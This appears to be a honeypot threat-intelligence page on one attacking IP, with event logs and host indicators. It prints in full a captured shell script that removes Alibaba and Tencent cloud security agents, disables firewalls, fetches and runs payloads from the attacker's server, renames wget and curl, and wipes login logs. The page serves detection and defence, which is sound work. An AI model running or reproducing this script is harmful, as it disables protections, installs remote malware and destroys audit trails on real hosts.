23.160.56.119
Location
🇺🇸 US / Salt Lake City
ASN
AS26042 · FiberState, LLC
Cloud Provider
—
Total Events
108
Above average by volume
Agent Count
2
First / Last Seen
2026-03-05 05:50 — 2026-03-09 16:16
Attack Types
External Corroboration
Not flagged by any external feeds
Campaigns
Multi-Agent Scan (119 entries, all with this same label)
Session Forensics
Sessions
6 (6 with login)
Avg Depth Score
0.9
Commands Executed
24
Files Downloaded
0
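Notable Commands
Note: the first entry below is a multi-line shell script captured in the session. The page renders each line break as "; ", which is why empty statements ("; ;") and forms such as "then;" appear, and the entry itself is wrapped across three lines. Read in order, the script does the following:
- Picks the first writable directory from a fixed list and works there.
- Stops, disables, masks and deletes the Alibaba Cloud (aegis / AliYunDun / CmsGoAgent) and Tencent Cloud (YDService / YunJing / tat_agent) host agents, then recreates their directories and marks them immutable with chattr +i so the agents cannot be reinstalled in place.
- Stops firewalld and ufw, sets the iptables policies to ACCEPT, and flushes the filter and nat tables.
- Fetches http://23.160.56.119/vos.txt and http://23.160.56.119/vox.txt over plain HTTP with certificate checking disabled, saves them as system_update and network_conf, and starts them detached with setsid.
- Renames wget and curl to good and cool.
- Overwrites wtmp, btmp, lastlog, syslog and auth.log, then deletes itself.
Host-side indicators that follow from this: masked aegis / aliyun / YDService / tat_agent units; empty immutable directories under /usr/local/aegis and /usr/local/qcloud; binaries named good or cool beside a missing wget or curl; executables named system_update or network_conf in /tmp, /var/tmp or /dev/shm; emptied login and auth logs.
Files Downloaded is 0 while the event table shows cowrie.session.file_upload, so the script was presumably delivered by upload rather than fetched from inside the session.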
- #!/bin/sh; ; wdir="/tmp"; for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do; if [ -w "$i" ]; then; wdir="$i"; break; fi; done; cd "$wdir" || exit 1; ; ; ; ; systemctl stop aegis >/dev/null 2>&1; systemctl disable aegis >/dev/null 2>&1; systemctl stop aliyun >/dev/null 2>&1; systemctl disable aliyun >/dev/null 2>&1; ; ; systemctl mask aegis >/dev/null 2>&1; systemctl mask aliyun >/dev/null 2>&1; systemctl daemon-reload; ; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1; fi; ; ; pkill -9 AliYunDun >/dev/null 2>&1; pkill -9 AliYunDunMonitor >/dev/null 2>&1; pkill -9 aegis_update >/dev/null 2>&1; pkill -9 CmsGoAgent >/dev/null 2>&1; ; ; rm -rf /usr/local/aegis >/dev/null 2>&1; rm -rf /etc/init.d/aegis >/dev/null 2>&1; ; ; mkdir -p /usr/local/aegis; if command -v chattr >/dev/null 2>&1; then; chattr +i /usr/local/aegis; fi; ; ; ; ; systemctl stop YDService >/dev/null 2>&1; systemctl disable YDService >/dev/null 2>&1; systemctl stop tat_agent >/dev/null 2>&1; systemctl disable tat_agent >/dev/null 2>&1; ; ; systemctl mask YDService >/dev/null 2>&1; systemctl mask tat_agent >/dev/null 2>&1; ; ; systemctl daemon-reload; ; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1; fi; ; ; pkill -9 YDService >/dev/null 2>&1; pkill -9 YDLive >/dev/null 2>&1; ; ; rm -rf /usr/local/qcloud/YunJing >/dev/null 2>&1; rm -rf /usr/local/qcloud/stargate >/dev/null 2>&1; rm -rf /usr/local/qcloud/monitor >/dev/null 2>&1; rm -rf /usr/local/qcloud/tat_agent >/dev/null 2>&1; ; mkdir -p /usr/local/qcloud/YunJing; mkdir -p /usr/local/qcloud/tat_agent; if command -v chattr >/dev/null 2>&1; then; chattr +i /usr/local/qcloud/YunJing; chattr +i /usr/local/qcloud/tat_agent; fi; ; ; ; disable_firewall() {; systemctl stop firewalld ufw >/dev/null 2>&1; systemctl disable firewalld ufw >/dev/null 2>&1; service firewalld stop >/dev/null 2>&1; service ufw stop >/dev/null 2>&1; ; if command -v 
iptables >/dev/null 2>&1; then; iptables -P INPUT ACCEPT >/dev/null 2>&1; iptables -P FORWARD ACCEPT >/dev/null 2>&1; iptables -P OUTPUT ACCEPT >/dev/null 2>&1; iptables -F >/dev/null 2>&1; iptables -X >/dev/null 2>&1; iptables -t nat -F >/dev/null 2>&1; iptables -t nat -X >/dev/null 2>&1; fi; }; disable_firewall; ; download_and_run() {; url="$1"; filename="$2"; ; if [ -f "./$filename" ] && [ -x "./$filename" ]; then; setsid "./$filename" >/dev/null 2>&1 &; return 0; fi; ; dl_bin=""; dl_args=""; ; if command -v good >/dev/null 2>&1; then; dl_bin="good"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v cool >/dev/null 2>&1; then; dl_bin="cool"; dl_args="-skL $url -o $filename"; elif command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v curl >/dev/null 2>&1; then; dl_bin="curl"; dl_args="-skL $url -o $filename"; fi; ; if [ -z "$dl_bin" ]; then; apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1; yum install -y wget curl >/dev/null 2>&1; if command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; fi; fi; ; if [ -n "$dl_bin" ]; then; $dl_bin $dl_args >/dev/null 2>&1; if [ -f "$filename" ]; then; chmod +x "$filename"; setsid "./$filename" >/dev/null 2>&1 &; fi; fi; }; ; lock_tools() {; command -v chattr >/dev/null 2>&1 && chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1; ; w_path=$(which wget 2>/dev/null); if [ -n "$w_path" ]; then; case "$w_path" in; *good*) ;;; *) mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1 ;;; esac; fi; ; c_path=$(which curl 2>/dev/null); if [ -n "$c_path" ]; then; case "$c_path" in; *cool*) ;;; *) mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1 ;;; esac; fi; }; ; SERVER_IP="23.160.56.119"; download_and_run "http://$SERVER_IP/vos.txt" "system_update"; download_and_run "http://$SERVER_IP/vox.txt" "network_conf"; ; lock_tools; ; cleanup() {; for log in 
/var/log/wtmp /var/log/btmp /var/log/lastlog /var/log/syslog /var/log/auth.log; do; if [ -f "$log" ]; then; echo > "$log" 2>/dev/null; fi; done; rm -f "$0"; }; cleanup; ; rm -- "$0"; rm -f /root/vos.sh; rm -f /tmp.vos.sh; exit 0
- /bin/skhqwensw
- /bin/skhqwensw
- ls -la /var/run/gcc.pid
Fingerprints
HASSH
SSH Client
Recent Events (last 50)
| Timestamp | Port | Proto | Event | Location |
|---|---|---|---|---|
| 2026-03-09 16:16:10 | :22 | ssh | cowrie.session.closed | sea |
| 2026-03-09 16:16:10 | :22 | ssh | cowrie.log.closed | sea |
| 2026-03-09 16:16:10 | :22 | ssh | cowrie.command.input | sea |
| 2026-03-09 16:16:10 | :22 | ssh | cowrie.session.params | sea |
| 2026-03-09 16:16:10 | :22 | ssh | cowrie.client.size | sea |
| 2026-03-09 16:16:10 | :22 | ssh | cowrie.log.closed | sea |
| 2026-03-09 16:16:09 | :22 | ssh | cowrie.command.failed | sea |
| 2026-03-09 16:16:09 | :22 | ssh | cowrie.command.input | sea |
| 2026-03-09 16:16:09 | :22 | ssh | cowrie.session.params | sea |
| 2026-03-09 16:16:09 | :22 | ssh | cowrie.client.size | sea |
| 2026-03-09 16:16:09 | :22 | ssh | cowrie.session.file_upload | sea |
| 2026-03-09 16:15:06 | :22 | ssh | cowrie.command.input | sea |
| 2026-03-09 16:15:06 | :22 | ssh | cowrie.session.params | sea |
| 2026-03-09 16:15:06 | :22 | ssh | cowrie.client.size | sea |
| 2026-03-09 16:15:05 | :22 | ssh | cowrie.login.success | sea |
| 2026-03-09 16:15:05 | :22 | ssh | cowrie.client.kex | sea |
| 2026-03-09 16:15:05 | :22 | ssh | cowrie.client.version | sea |
| 2026-03-09 16:15:05 | :22 | ssh | cowrie.session.connect | sea |
| 2026-03-09 16:11:52 | :22 | ssh | cowrie.session.closed | sin |
| 2026-03-09 16:11:52 | :22 | ssh | cowrie.log.closed | sin |
| 2026-03-09 16:11:51 | :22 | ssh | cowrie.command.input | sin |
| 2026-03-09 16:11:51 | :22 | ssh | cowrie.session.params | sin |
| 2026-03-09 16:11:51 | :22 | ssh | cowrie.client.size | sin |
| 2026-03-09 16:11:51 | :22 | ssh | cowrie.log.closed | sin |
| 2026-03-09 16:11:51 | :22 | ssh | cowrie.command.failed | sin |
| 2026-03-09 16:11:51 | :22 | ssh | cowrie.command.input | sin |
| 2026-03-09 16:11:51 | :22 | ssh | cowrie.session.params | sin |
| 2026-03-09 16:11:50 | :22 | ssh | cowrie.client.size | sin |
| 2026-03-09 16:11:50 | :22 | ssh | cowrie.session.file_upload | sin |
| 2026-03-09 16:10:18 | :22 | ssh | cowrie.command.input | sin |
| 2026-03-09 16:10:18 | :22 | ssh | cowrie.session.params | sin |
| 2026-03-09 16:10:18 | :22 | ssh | cowrie.client.size | sin |
| 2026-03-09 16:10:17 | :22 | ssh | cowrie.login.success | sin |
| 2026-03-09 16:10:16 | :22 | ssh | cowrie.client.kex | sin |
| 2026-03-09 16:10:16 | :22 | ssh | cowrie.client.version | sin |
| 2026-03-09 16:10:16 | :22 | ssh | cowrie.session.connect | sin |
| 2026-03-09 04:20:36 | :22 | ssh | cowrie.session.closed | sin |
| 2026-03-09 04:20:36 | :22 | ssh | cowrie.log.closed | sin |
| 2026-03-09 04:20:36 | :22 | ssh | cowrie.command.input | sin |
| 2026-03-09 04:20:36 | :22 | ssh | cowrie.session.params | sin |
| 2026-03-09 04:20:36 | :22 | ssh | cowrie.client.size | sin |
| 2026-03-09 04:20:35 | :22 | ssh | cowrie.log.closed | sin |
| 2026-03-09 04:20:35 | :22 | ssh | cowrie.command.failed | sin |
| 2026-03-09 04:20:35 | :22 | ssh | cowrie.command.input | sin |
| 2026-03-09 04:20:35 | :22 | ssh | cowrie.session.params | sin |
| 2026-03-09 04:20:35 | :22 | ssh | cowrie.client.size | sin |
| 2026-03-09 04:20:35 | :22 | ssh | cowrie.session.file_upload | sin |
| 2026-03-09 04:19:08 | :22 | ssh | cowrie.command.input | sin |
| 2026-03-09 04:19:08 | :22 | ssh | cowrie.session.params | sin |
| 2026-03-09 04:19:07 | :22 | ssh | cowrie.client.size | sin |